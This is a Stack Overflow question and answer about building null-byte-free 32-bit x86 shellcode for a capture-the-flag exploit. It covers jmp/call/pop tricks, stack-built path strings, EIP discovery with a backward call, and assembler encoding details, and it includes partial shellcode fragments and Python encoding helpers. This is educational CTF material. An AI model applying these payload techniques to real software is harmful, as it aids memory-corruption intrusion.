Question
I am trying to write shellcode for a CTF challenge that does not allow for 0x00 bytes (it will be interpreted as a terminator). Due to restrictions in the challenge, I must do something like this:
[shellcode bulk]
[(0x514 - sizeof(shellcode bulk)) filler bytes]
[fixed constant data to overwrite global symbols]
[shellcode data]
It looks something like this
.intel_syntax noprefix
.code32
shellcode:
jmp sc_data
shellcode_main:
#open
xor eax, eax
pop ebx //file string
xor ecx, ecx //flags
xor edx, edx //mode
mov al, 5 //sys_OPEN
int 0x80
... // more shellcode
.org 514, 0x41 // filler bytes
.long 0xffffffff // bss constant overwrite
sc_data:
call shellcode_main
.asciz "/path/to/fs/file"
This works beautifully if sc_data is within 127 bytes of shellcode. In this case the assembler (GAS) will output a short jump of format:
Opcode Mnemonic
EB cb JMP rel8
However, since I have a hard restriction that I need 0x514 bytes for the bulk shellcode and filler bytes, this relative offset will need at least 2 bytes. This would also work because there is a 2-byte relative encoding for the jmp instruction:
Opcode Mnemonic
E9 cw JMP rel16
Unfortunately, GAS does not output this encoding. Rather it uses the 4-byte offset encoding:
Opcode Mnemonic
E9 cd JMP rel32
This results in two MSB bytes of zeros. Something similar to:
e9 01 02 00 00
My question is: can GAS be forced to output the 2-byte variant of the jmp instruction? I toyed around with multiple smaller 1-byte jmps, but GAS kept outputting the 4-byte variant. I also tried invoking GCC with -Os to optimize for size, but it insisted on using the 4-byte relative offset encoding.
Intel jump opcode defined here for reference.
Answer 1:
jmp rel16 is only encodable with an operand-size of 16, which truncates EIP to 16 bits. (The encoding requires a 66 operand-size prefix in 32 and 64-bit mode.) As described in the instruction-set reference you linked, or in this more up-to-date PDF->HTML conversion of Intel's manual, jmp does EIP ← tempEIP AND 0000FFFFH; when the operand-size is 16. This is why assemblers never use it unless you manually request it (see Footnote 1), and why you can't use jmp rel16 in 32 or 64-bit code except in the very unusual case where the target is mapped in the low 64 KiB of virtual address space (see Footnote 2).
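To make the truncation concrete, here is a minimal Python sketch of the arithmetic the manual describes. It only models the address calculation and is not an emulator. The function names are made up for illustration, and the sample values are taken from the objdump listing in Footnote 1.

```python
import struct

def jmp_rel16_target(insn_addr: int, rel16: int) -> int:
    """Model `66 E9 cw` (jmp rel16) executed in 32-bit mode.

    The instruction is 4 bytes long (prefix + opcode + 2-byte displacement).
    With a 16-bit operand size the result is masked to 16 bits.
    """
    next_eip = insn_addr + 4                 # address of the following instruction
    return (next_eip + rel16) & 0x0000FFFF   # EIP <- tempEIP AND 0000FFFFH

def encode_jmp_rel16(rel16: int) -> bytes:
    """Hand-assemble the near jump with a 16-bit operand size."""
    return b"\x66\xe9" + struct.pack("<h", rel16)

# Values from the objdump listing in Footnote 1: a jump-to-self at 0x400080.
print(encode_jmp_rel16(-4).hex(" "))         # 66 e9 fc ff
print(hex(jmp_rel16_target(0x400080, -4)))   # 0x80, not 0x400080
```

The encoding itself is free of zero bytes, but the upper 16 bits of the target are lost, which is why it is useless for this payload.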
Avoiding jmp rel32
You're only jumping forward so that you can use call rel32 to push the address of your data, and because you want your data all the way at the end of your long padded payload.
You could instead construct the string on the stack with push imm32/imm8/reg and mov ebx, esp. (You already have a zeroed register you can push for the terminating zero byte.)
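As a rough illustration of the stack-string idea, the following Python sketch generates the push sequence for a path. The helper name push_string_asm is hypothetical, and it assumes that EAX is already zero at that point and that the path length is a multiple of 4 (pad with extra '/' characters otherwise).

```python
import struct

def push_string_asm(path: bytes) -> list:
    """Return GAS Intel-syntax lines that build `path` on the stack.

    Assumes EAX == 0 (it supplies the terminator) and len(path) % 4 == 0.
    """
    if len(path) % 4 != 0:
        raise ValueError("pad the path to a multiple of 4 bytes, e.g. with '/'")
    if b"\x00" in path:
        raise ValueError("path must not contain zero bytes")
    lines = ["push eax"]                      # terminating zero dword
    # The stack grows down, so the last 4 bytes are pushed first.
    for i in range(len(path) - 4, -1, -4):
        (dword,) = struct.unpack("<I", path[i:i + 4])
        lines.append(f"push 0x{dword:08x}")   # push imm32, little-endian
    lines.append("mov ebx, esp")              # EBX -> start of the string
    return lines

for line in push_string_asm(b"/path/to/fs/file"):
    print(line)
```

Since every immediate is made of path characters, none of the push imm32 encodings contains a zero byte.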
If you don't want to construct data on the stack, and instead use data that's part of your payload, use position-independent code / relative addressing for it. Perhaps you have a value in a register that's a known offset from EIP, e.g. if your exploit code was reached with a jmp esp or other ret-2-reg attack. In that case, you might be able to just mov ecx, 0x12345678 / shr ecx, 16 / lea ebx, [esp+ecx].
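The mov / shr pair works because the wanted offset sits in the upper bits of an immediate whose lower bits are filler. A small Python sketch of how such an immediate could be picked is shown here. The helper name zero_free_imm32 is hypothetical, and 0x514 is just the padded size from the question.

```python
import struct

def zero_free_imm32(offset: int, shift: int = 16) -> int:
    """Return an imm32 with no 0x00 bytes such that (imm32 >> shift) == offset."""
    filler = (1 << shift) - 1                 # all-ones in the bits that get shifted out
    imm = (offset << shift) | filler
    if imm >> 32:
        raise ValueError("offset does not fit in 32 bits after shifting")
    if 0 in struct.pack("<I", imm):
        raise ValueError("still contains a zero byte; try another shift count")
    return imm

imm = zero_free_imm32(0x514)
print(hex(imm))                               # 0x514ffff
print(hex(imm >> 16))                         # 0x514
```

If an offset such as 0x100 leaves a zero byte with a shift of 16, a different shift count (17 in that case) moves the bits so that every byte is nonzero.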
Or, if you had to use a NOP sled and you don't know the exact value of EIP relative to any register value, you can obtain the current value of EIP with a call instruction with a negative displacement. Jump forward over the call target, then call back to it. You can put data right after that call. (But avoiding zero bytes in the data is inconvenient; you can store some once you get a pointer to it.)
# Position-independent 32-bit code to find EIP
# and get label addresses into registers
# and insert zeros into data that we jumped over.
jmp .Lcall
.Lget_eip:
pop ebx
jmp .Lafter_call # jmp rel8
.Lcall: call .Lget_eip # backward rel32 = 0xffffff??
# execution never returns here
.Lmsg: .ascii "/path/to/fs/file/" # last byte to be overwritten
msglen = . - .Lmsg
.Loffset_data2: .long .Ldata2 - .Lmsg # relative offset to other data, or make this a 16-bit int to avoid zeros
# max data size 127 - 5 bytes
.Lafter_call:
# EBX = OFFSET .Lmsg just from the call + pop
# Insert a zero at runtime because the data wasn't at the end of the payload
mov byte ptr [ebx+ msglen - 1], al # with al=0
# ESI = OFFSET .Ldata2 using an offset loaded from memory
mov esi, ebx
add esi, [ebx + .Loffset_data2 - .Lmsg] # [ebx + disp8]
# with an immediate displacement, avoiding zero bytes
mov ecx, ((.Ldata3 - .Lmsg) << 17) | 0xffff
shr ecx, 17 # choose shift count to avoid high zeros
lea edi, [ebx + ecx] # edi = OFFSET .Ldata3
# if disp8 doesn't work but 8 * disp8 does: small code size
push (.Ldata3 - .Lmsg)>>3 # push imm8: offset / 8, must fit in a signed 8-bit immediate
pop ecx
lea edi, [ebx + ecx*8 + (.Ldata3 - .Lmsg)&7] # disp8 of the low 3 bits
...
# at the end of your payload
.Ldata2:
# whatever you want, arbitrary size
.Ldata3:
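The reason the backward call is safe while the forward jmp is not comes down to sign extension of the rel32 field. The following Python sketch encodes both by hand. The displacement 0x201 is the one from the question's hex dump, and -8 assumes the layout above (1-byte pop, 2-byte jmp rel8, then the 5-byte call itself).

```python
import struct

def encode_rel32(opcode: int, disp: int) -> bytes:
    """Encode a 5-byte near jmp (0xE9) or call (0xE8) with a rel32 displacement."""
    return bytes([opcode]) + struct.pack("<i", disp)

forward_jmp = encode_rel32(0xE9, 0x201)   # small positive: upper bytes are 00
backward_call = encode_rel32(0xE8, -8)    # small negative: upper bytes are ff

print(forward_jmp.hex(" "))               # e9 01 02 00 00
print(backward_call.hex(" "))             # e8 f8 ff ff ff
print(0 in forward_jmp, 0 in backward_call)   # True False
```

A backward displacement can still contain a zero byte if one of its bytes happens to be 00 (for example -256), so it is worth checking the final encoding.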
In 64-bit code, it's much easier:
# In 64-bit code
jmp .Lafter_data
.Lmsg1: .ascii "/foo/bar/" # last bytes to be replaced
.Lmsg2: .ascii "/bin/sh/"
.Lafter_data:
lea rdi, [RIP + .Lmsg1] # negative rel32
lea rsi, [rdi + .Lmsg2 - .Lmsg1] # disp8
xor eax,eax
mov byte ptr [rsi - 1], al # insert zeros
mov byte ptr [rsi + len], al
Or use a RIP-relative LEA to get a label address and use some zero-avoiding method to add an immediate constant to it to get the address of a label at the end of your payload.
.Lbase:
lea rdi, [RIP + .Lbase]
xor ecx,ecx
mov cx, .Lpath - .Lbase
add rdi, rcx # RDI = .Lpath address
...
syscall
... # more than 128 bytes
.Lpath:
.asciz "/foo/bar"
If you really need to jump far, instead of just position-independent addressing of far-away "static" data:
A chain of short forward jumps would work.
Or use any of the above methods to find the address of a later label in a register, and use jmp eax.
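For a sense of scale, this Python sketch estimates how many chained jmp rel8 instructions the first option needs. It assumes each hop is the 2-byte EB cb form with the maximum forward displacement of 127, and that the intermediate jumps may be placed inside the filler region; the function name is hypothetical.

```python
import math

JMP_REL8_LEN = 2     # EB cb
MAX_FORWARD = 127    # largest positive rel8, counted from the end of the jmp

def short_jump_hops(distance: int) -> int:
    """Minimum number of chained jmp rel8 needed to move `distance` bytes
    forward, measured from the start of the first jmp to the final target."""
    reach = JMP_REL8_LEN + MAX_FORWARD       # at most 129 bytes per hop
    return math.ceil(distance / reach)

print(short_jump_hops(0x514))                # 11
```

Each hop costs two bytes of the filler region, and none of them contains a zero byte as long as no hop has a displacement of 0.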
Saving code bytes:
In your case, saving code size doesn't help you avoid long jump displacements, but it probably will for some other people.
You can save code bytes using these Tips for golfing in x86/x64 machine code:
- xor eax,eax / cdq saves 1 byte vs. xor edx,edx.
- xor ecx,ecx / mul ecx zeroes three registers in 4 bytes (ECX and EDX:EAX).
- Actually, your best bet for that int 0x80 setup is probably xor ecx,ecx (2B) / lea eax, [ecx+5] (3B) / cdq (1B), and don't use mov al,5 at all. You can put arbitrary small constants in registers in only 3 bytes with push imm8 / pop, or with one lea if you have another register with a known value.
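The byte counts above can be checked with a short Python tally. The encodings below are written out by hand (one valid 32-bit encoding per instruction, not assembler output), so treat them as an assumption to confirm with objdump.

```python
# One valid 32-bit machine-code encoding for each instruction mentioned above.
ENCODINGS = {
    "xor eax, eax":     bytes.fromhex("31c0"),
    "xor ecx, ecx":     bytes.fromhex("31c9"),
    "xor edx, edx":     bytes.fromhex("31d2"),
    "mov al, 5":        bytes.fromhex("b005"),
    "cdq":              bytes.fromhex("99"),
    "mul ecx":          bytes.fromhex("f7e1"),
    "lea eax, [ecx+5]": bytes.fromhex("8d4105"),
}

def size(*insns: str) -> int:
    """Total encoded length of a sequence of instructions."""
    return sum(len(ENCODINGS[i]) for i in insns)

original = size("xor eax, eax", "xor ecx, ecx", "xor edx, edx", "mov al, 5")
golfed = size("xor ecx, ecx", "lea eax, [ecx+5]", "cdq")
print(original, golfed)                                   # 8 6
print(any(0 in enc for enc in ENCODINGS.values()))        # False
```

Both sequences leave EAX = 5 and ECX = EDX = 0, and neither introduces a zero byte.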
Footnote 1: asking your assembler to encode jmp rel16 outside of 16-bit mode:
NASM (in 16, 32 or 64-bit mode)
addr:
; times 256 db 0 ; padding to make it jump farther.
o16 jmp near addr ; force 16-bit operand-size and near (not short) displacement
AT&T syntax: objdump -d decodes it as jmpw. For the above NASM source assembled into a 32-bit static ELF binary, objdump -drwC foo shows the truncation of EIP:
0000000000400080 <addr>:
400080: 66 e9 fc ff jmpw 80 <addr-0x400000>
But GAS seems to think that mnemonic is only for indirect jumps (where it would mean a 16-bit load). It warns foo.S:5: Warning: indirect jmp without '*', and this GAS source: .org 1024; addr: .zero 128; jmpw addr gives you
480: 66 ff 25 00 04 00 00 jmpw *0x400 483: R_386_32 .text
See "what is jmpl instruction in x86?": this insane inconsistency in how GAS handles AT&T syntax applies even to jmpl. Plain jmp 0x400 when assembling in 16-bit mode would be a relative jump to that absolute offset.
In the extremely unlikely case you wanted a jmp rel16 in other modes, you'd have to assemble it yourself with .byte and .short. I don't think there's even a way to get the assembler to emit it for you.
Footnote 2: You can't use jmp rel16 in 32/64-bit code, unless you're attacking some code mapped in the low 64 KiB of virtual address space, e.g. maybe something running under DOSEMU or WINE. Linux's default setting for /proc/sys/vm/mmap_min_addr is 65536, not 0, so normally nothing can mmap that memory even if you want to, or presumably load its text segment at that address via the ELF program loader. (So NULL-pointer dereferences with an offset segfault instead of silently accessing memory.)
You can be sure that your CTF target won't happen to be running with EIP = IP, and that truncating EIP to IP will just segfault.
Source: https://stackoverflow.com/questions/50341094/gas-assembler-not-using-2-byte-relative-jmp-displacement-encoding-only-1-byte-o